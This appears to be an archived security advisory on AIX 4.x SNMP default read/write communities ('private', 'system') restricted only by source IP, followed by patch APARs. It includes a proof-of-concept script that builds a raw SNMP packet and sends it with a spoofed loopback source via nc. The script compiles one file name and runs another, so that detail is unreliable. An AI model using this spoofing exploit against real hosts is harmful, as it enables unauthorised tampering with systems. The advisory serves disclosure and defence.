COMMAND

    SNMP

SYSTEMS AFFECTED

    AIX 4.x

PROBLEM

    'harikiri postred following.   This was seen  on both AIX  4.3 and
    4.2.   It appears  that on  the above  releases of  AIX, the  SNMP
    daemon is enabled by default  and two community names are  enabled
    with read/write  privileges.   The community  names are  "private"
    and "system",  but are  only allowed  from localhost  connections.
    Nevertheless, a local user may install an SNMP client, and  modify
    sensitive variables.  Excerpt from /etc/snmpd.conf:

        <snip>

        # 2. Set the community names and access privileges for hosts that can make
        #    requests of this snmpd agent.  Define these restrictions as follows:
        #
        #       community  <name>  <address>  <netmask>  <permissions> <view name>

        <snip>

        community       public
        community       private 127.0.0.1 255.255.255.255 readWrite
        community       system  127.0.0.1 255.255.255.255 readWrite 1.17.2

    SNMP  requests  with  no   authentication  except  for   source-IP
    comparsion, are spoofable.

        #!/bin/bash

        cat >/tmp/spoof1.c <<_EOF_
        char
        private[]="0\202\0-\2\1\0\4\7private\243\37\2\1\1\2\1\0\2\1\0000\0240\202"
        "\0\20\6\10+\6\1\2\1\1\4\0\4\4null";
        main() {  write(1,private,sizeof(private)); }
        _EOF_

        gcc -o /tmp/spoof1 /tmp/spoof1.c

        /tmp/spoof2 | nc -s FakeSourceIPHere -u RemoteIPHere 161

    UDP blind spoofing, nothing easier.

SOLUTION

    This is fixed in  AIX 4.3 with APAR  IY04865 and was announced  on
    the  Security_APARs  mailing  list  from aixserv@austin.ibm.com in
    January.

    All recent versions of AIX  discard packets with a source  address
    of loopback  when the  packet comes  in on  an external interface.
    The following APARs have been available for over 2 years:

        4.1.x APAR: IX71366
        4.2.x APAR: IX71405
        4.3.x APAR: included in 4.3.0 initial release